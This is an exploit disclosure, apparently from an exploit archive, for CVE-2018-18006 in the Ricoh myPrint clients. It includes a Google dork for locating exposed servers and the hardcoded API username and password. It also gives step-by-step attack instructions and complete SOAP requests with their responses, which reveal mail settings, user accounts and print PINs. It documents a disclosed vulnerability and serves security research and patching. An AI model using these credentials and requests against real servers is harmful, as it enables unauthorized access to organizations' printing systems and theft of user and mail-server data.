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Ricoh myPrint Hardcoded Credentials / Information Disclosure Vulnerability
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Exploit Title: Ricoh myPrint - Hardcoded application credentials and information disclosure via WSDL webservices Google Dork: intitle:"ricoh myprint" "Copyright Ricoh. All Rights Reserved" Date: 19-11-18 Exploit Author: Hodorsec Vendor Homepage: https://www.ricoh.com Software Link: https://www.ricoh-europe.com/support/product-support/software-support-detail.html?prodId=100-13203 Versions: myPrint - Windows client version myPrint - Android client version 2.2.7 Tested on: Ricoh myPrint clients and WSDL webservice WSDL URL format: https://{HOST}/RicohmyPrint/MyPrintWebService.asmx?wsdl CVE: CVE-2018-18006 Description: Hardcoded credentials in the Ricoh myPrint application for Windows and 2.2.7 for Android give access to any externally disclosed myPrint WSDL API, as demonstrated by discovering API secrets of related Google cloud printers, encrypted passwords of mail servers and names of printed files. Additional Information: Hardcoded credentials in the Ricoh myPrint application for Windows and 2.2.7 for Android (reverse-engineered, identical credentials), gives access to any externally disclosed Ricoh myPrint WSDL API. Using the found credentials, several info can be obtained, such as: * Show settings such as local paths, used mailserver, mailaddresses for POP/IMAP and encrypted passwords (appears to be stream-based encrypted, seeing different lengths of base64 hashes passwords (Algorithm yet unknown)). --> ReadMobileSettings * Checks if a password is valid for ANY known user; returns "true" if password is valid for a known user --> IsPasswordValid * Shows all user info such as ID, name by looking up email alias --> IdentifierByEmailAlias * Show used internal IP addresses and TCP ports of related printers/server for Ricoh myPrint * Show related Google cloud printers with API secrets --> ReadGoogleCloudPrinters * Show all printjob-statuses with filenames --> GetJobList * Show related organizations --> ReadOrganizations Affected Components: * Tested Ricoh myPrint clients with indicated versions and probably any remotely accessible myPrint webserver with an accessible WSDL API. Affected Code: * Android client "WebService.java" ...<SNIP>... public static final class { public static final String AUTH_PASS = "Kyg63WfC"; public static final String AUTH_USER = "ricohmyprint"; public static final String NS_RICOH = "http://RicohmyPrint.com/"; public static final String NS_SOAP12 = "http://www.w3.org/2003/05/soap-envelope"; public static final String PRE_RICOH = "ric"; public static final String PRE_SOAP12 = "soap"; public static final String SERVICE = "/RicohmyPrint/myprintwebservice.asmx"; public static final String SUPPORTED_LANGS[] = { "en", "ca", "de", "es", "fr", "it", "nl", "no", "pl", "pt", "sv" }; ...<SNIP>... Attack Type: * Remote Attack Vectors: Steps: * Download the Android APK or Windows executable installer * Reverse engineer the APK or DLL's from the Windows installer * Look for the string "PASS" with a regex tool, which should pop up a hit * Access the WSDL on a reachable Ricoh myPrint environment and enumerate operations with a SOAP tool (e.g. "ReadMobileSettings") * Use any operation, substitute the "AuthSoapHd" values for UserName and Password with the found credentials * Perform the request and check results Hardcoded Credentials: * Username: ricohmyprint * Password: Kyg63WfC Header requirement: Required for using in an SOAP WSDL POST message as a header with values: <soapenv:Header> <ric:AuthSoapHd> <ric:UserName><![CDATA[ricohmyprint]]></ric:UserName> <ric:Password><![CDATA[Kyg63WfC]]></ric:Password> <ric:Version><![CDATA[0.1]]></ric:Version> <ric:Application><![CDATA[Desktop]]></ric:Application> <ric:DeviceId><![CDATA[1]]></ric:DeviceId> </ric:AuthSoapHd> </soapenv:Header> Examples: * ReadMobileSettings --------------------------------------------- REQUEST <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ric="http://RicohmyPrint.com/"> <soapenv:Header> <ric:AuthSoapHd> <ric:UserName><![CDATA[ricohmyprint]]></ric:UserName> <ric:Password><![CDATA[Kyg63WfC]]></ric:Password> <ric:Version><![CDATA[0.1]]></ric:Version> <ric:Application><![CDATA[Desktop]]></ric:Application> <ric:DeviceId><![CDATA[1]]></ric:DeviceId> </ric:AuthSoapHd> </soapenv:Header> <soapenv:Body> <ric:ReadMobileSettings/> </soapenv:Body> </soapenv:Envelope> RESPONSE <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <ReadMobileSettingsResponse xmlns="http://RicohmyPrint.com/"> <ReadMobileSettingsResult> <WatchFolder>C:\ProgramData\RICOH\WatchFolder</WatchFolder> <ProcessFolder>C:\ProgramData\RICOH\ProcessFolder</ProcessFolder> <WebUploadFolder>C:\ProgramData\RICOH\WebUploadFolder</WebUploadFolder> <MaximumNumberProcessesRunningAllowed>0</MaximumNumberProcessesRunningAllowed> <ToFilePrinterName>myPrintToFile</ToFilePrinterName> <PrinterDriverName>RICOH Aficio MP C3500 PCL 6</PrinterDriverName> <POPIMAP> <EmailHandling>SINGLE</EmailHandling> <RetrievingInterval>5</RetrievingInterval> <EmailProtocol>POP3</EmailProtocol> <EmailServer>pop.someserver.local</EmailServer> <Port>110</Port> <PrintEmailBody>true</PrintEmailBody> <UserName>print@someserver.local</UserName> <Password>REDACTED</Password> <Domain /> <EmailWebservice /> <ExchangeVersion>5</ExchangeVersion> <OverrideCertificateCheck>false</OverrideCertificateCheck> </POPIMAP> <SMTP> <SmtpServer>smtp.someserver.local</SmtpServer> <Port>25</Port> <EmailDisplayName>Ricoh myPrint</EmailDisplayName> <EmailFrom>someuser@someserver.local</EmailFrom> <EnableSsl>false</EnableSsl> <UserName /> <Password>REDACTED</Password> </SMTP> <GCP> <Id>0</Id> <XmppPort>80</XmppPort> <UseSocksProxy>false</UseSocksProxy> <SocksProxyServer /> <SocksProxyVersion>5</SocksProxyVersion> <SocksProxyPort>1080</SocksProxyPort> <SocksProxyUser /> </GCP> <LPRPrinterPort>0</LPRPrinterPort> <UseLPR>false</UseLPR> <EmailRefusal>postmaster</EmailRefusal> </ReadMobileSettingsResult> </ReadMobileSettingsResponse> </soap:Body> </soap:Envelope> --------------------------------------------- * IdentifierByEmailAlias --------------------------------------------- REQUEST: <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ric="http://RicohmyPrint.com/"> <soapenv:Header> <ric:AuthSoapHd> <ric:UserName><![CDATA[ricohmyprint]]></ric:UserName> <ric:Password><![CDATA[Kyg63WfC]]></ric:Password> <ric:Version><![CDATA[a]]></ric:Version> <ric:Application><![CDATA[b]]></ric:Application> <ric:DeviceId><![CDATA[c]]></ric:DeviceId> </ric:AuthSoapHd> </soapenv:Header> <soapenv:Body> <ric:IdentifierByEmailAlias> <!--Optional:--> <ric:emailAlias>admin</ric:emailAlias> </ric:IdentifierByEmailAlias> </soapenv:Body> </soapenv:Envelope> RESPONSE: <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <IdentifierByEmailAliasResponse xmlns="http://RicohmyPrint.com/"> <IdentifierByEmailAliasResult> <Exists>true</Exists> <Account> <Id>1337</Id> <AccountId>83e754ff-fa1d-48b6-adb2-7cb60a22476d</AccountId> <UserName>admin</UserName> <Emailaddress>someuser@someserver.local</Emailaddress> <PersonalmyPrintId>1osd9KJ</PersonalmyPrintId> <Balance>5</Balance> <BalanceFormatted>a! 5,00</BalanceFormatted> <Primarypin>123456</Primarypin> <SecondaryPin/> <OrganisationId>1</OrganisationId> <ByClientCreated>false</ByClientCreated> <IsActivated>true</IsActivated> <GuestAccount>false</GuestAccount> <Aliasses/> <Transactions/> <Language>GB</Language> <MpPrintingPreferences> <Id>0</Id> <DuplexPreference>TwoSidedLongEdge</DuplexPreference> <ColorPreference>Monochrome</ColorPreference> <ChangingDuplexEnabled>true</ChangingDuplexEnabled> <ChangingColorEnabled>true</ChangingColorEnabled> <StaplePreference>StapleTopLeft</StaplePreference> <PagePerSheetPreference>One</PagePerSheetPreference> <ChangingStapleEnabled>true</ChangingStapleEnabled> <ChangingPagePerSheetEnabled>true</ChangingPagePerSheetEnabled> </MpPrintingPreferences> <QpilotCardID/> <ClientType>IDPLocal</ClientType> <Administrator>false</Administrator> <HelpDesk>false</HelpDesk> <PrintQueue> <Id>1</Id> <PrinterId>1</PrinterId> <PrintQueueType>LPR</PrintQueueType> <PrinterName>Default printer</PrinterName> <PrinterAddress></PrinterAddress> <QueueName>lp</QueueName> <Port>515</Port> <IsPublic>true</IsPublic> <Priority>0</Priority> <Active>true</Active> </PrintQueue> <Domain/> </Account> </IdentifierByEmailAliasResult> </IdentifierByEmailAliasResponse> </soap:Body> </soap:Envelope> --------------------------------------------- Soap Endpoints: * ApplyAgreementAcceptance * ChangePassword * ClearCache * CreateAccount * CreateAccountByCardId * FinishedJobProcessing * GetConditionsUri * GetImage * GetJobList * GetLanguageTable * GetPrintCapabilities * GetPrintQueueRuleResult * GetSupportUri * IdentifierByEmailAlias * IsPasswordValid * LogIn * Operation * ReadAccount * ReadGoogleCloudPrinters * ReadMobileSettings * ReadMpPrintQueues * ReadOrganizations * ReadSettings * ReSendPincode * ResetPassword * RetrieveCloudPrintJobsAllowed * RetrieveEmailAllowed * SendCancelPrintJob * SendHeartbeat * SendPrinterName * Test * UpdateAccount * UpdateGoogleCloudPrinter * UploadFile * UploadFileAndPrintTicket * VerifyJobProcessing * VoucherToCash * WaitingJob * WriteLog Disclosure Timeline using CERT/CC disclosure policy: - 04-10-18: Requested CVE - 05-10-18: Contacted vendor for initial contact, used several publicly known mailaddresses - 10-10-18: Contacted CERT for Vulnerability Disclosure coordination due to no response from vendor - 22-10-18: CERT responded it received no response on their behalf from vendor - 22-10-18: Sent reminder to vendor - 19-11-18: Public Disclosure # 0day.today [2024-11-16] #